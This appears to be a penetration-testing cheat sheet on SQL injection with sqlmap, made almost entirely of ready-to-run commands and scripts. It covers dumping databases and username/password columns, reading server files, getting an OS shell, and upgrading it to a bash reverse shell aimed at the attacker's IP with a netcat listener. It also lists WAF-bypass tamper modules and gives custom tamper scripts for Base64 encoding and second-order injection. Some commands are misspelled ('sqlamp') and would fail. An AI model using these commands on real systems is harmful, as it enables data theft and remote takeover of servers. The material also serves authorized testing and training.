SQL Injection with Sqlmap
Last modified: 2023-02-10
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This page provides how to inject SQL using sqlmap.
Basic Commands
# GET request
sqlmap -u "http://<target-ip>/?search=test"
# -p: target parameter
sqlmap -u "http://<target-ip>/?category=test&item=1" -p item
# Header param injection
sqlmap -u "https://example.com/?search=test" --headers "X-Forwarded-For: 1*"
# POST request
sqlmap -u "http://<target-ip>" --data="username=test&password=test"
Using Request File
We can specify a request file which is generated in Burp Suite.
It can be used by adding the "-r" flag.
sqlmap -r request.txt
sqlmap -r request.txt --dump --dbs --tables --columns --random-agent
sqlmap -r request.txt --dump --dbms mysql --risk 3 --level 5
# --fresh-queries: new data in tables
sqlmap -r request.txt --fresh-queries
# --current-user: Retrieve current user
sqlmap -r request.txt --current-user
# --current-db: Retrieve current DB
sqlamp -r request.txt --current-db
# Specify dabase name, table name, column name
sqlmap -r request.txt -D database_name -T table_name -C column_name
# Specify multiple columns
sqlmap -r request.txt -D database_name -T table_name -C username,password
# --technique U: Union attack
# --delay 2: Time delay
sqlmap -r request.txt --technique U --delay 2
# --technique T: Time-based Blind SQLi
sqlmap -r request.txt --technique T
# --time-sec: Sleep time for Time-Based Blind SQLi
sqlmap -r request.txt --time-sec 2
# --ignore-code: Ignore specific response
sqlmap -r request.txt --ignore-code 401
# --dump-all: Dump all database table entries
sqlmap -r request.txt --dump-all
Web Shell
Add option "--os-shell" to interact with web shell.
sqlmap -u "http://<target-ip>" --cookie="value=*" --os-shell
After activating, you may want to upgrade to the full functional shell.
You can do that using reverse shell.
In your local machine,
nc -lvnp 4444
Then execute the following command in web shell.
os-shell> bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'
Read Files
# --batch: never ask for user input, use the default behavior
sqlmap -r request.txt --file-read "/var/www/html/index.php" --time-sec 10 --batch
sqlmap -r request.txt --file-read "/var/www/<subdomain>/index.php" --time-sec 10 --batch
sqlmap -u "http://<target-ip>/?q=test" --file-read "var/www/html/index.php" --time-sec 10 --batch
Tamper
The sqlmap can be tampered by custom python script e.g. tamper.py or the default library.
WAF (Web Application Firewall) Bypass
This post explains details for what each module works.
# General
sqlmap -r request.txt --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
# MSSQL
sqlmap -r request.txt --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
# MySQL
sqlamp -r request.txt --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Custom tamper modules (Base64 encode)
We can also create our custom modules.
For instance, we create "tamper.py".
#!/usr/bin/python3
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
payload = encodeBase64("%s" % payload, binary=False)
return payload
Then execute sqlmap.
# The tamper is a module, so we need to create __init__.py in the current directory.
touch __init__.py
sqlmap -u "https://example.com/" --cookie "session=*" --tamper=tamper.py
Multiple Requests
#!/usr/bin/python
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
address = "http://vulnerable.com"
password = "test"
def dependencies():
pass
def create_account(payload):
with requests.Session() as s:
data = {"username": payload, "password": password}
resp = s.post(f"{address}/signup", data=data)
def login(payload):
with requests.Session() as s:
data = {"username": payload, "password": password}
resp = s.post(f"{address}/login", data=data)
sessid = s.cookies.get("session", None)
return "session={}".format(sessid)
def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
create_account(payload)
headers["Cookie"] = login(payload)
return payload
Then run the sqlmap with the tamper option.
sqlmap --tamper tamper.py --url http://vulnerable.com/signup --data "username=admin&password=test" --second-url "http://vulnerable.com/post" --no-cast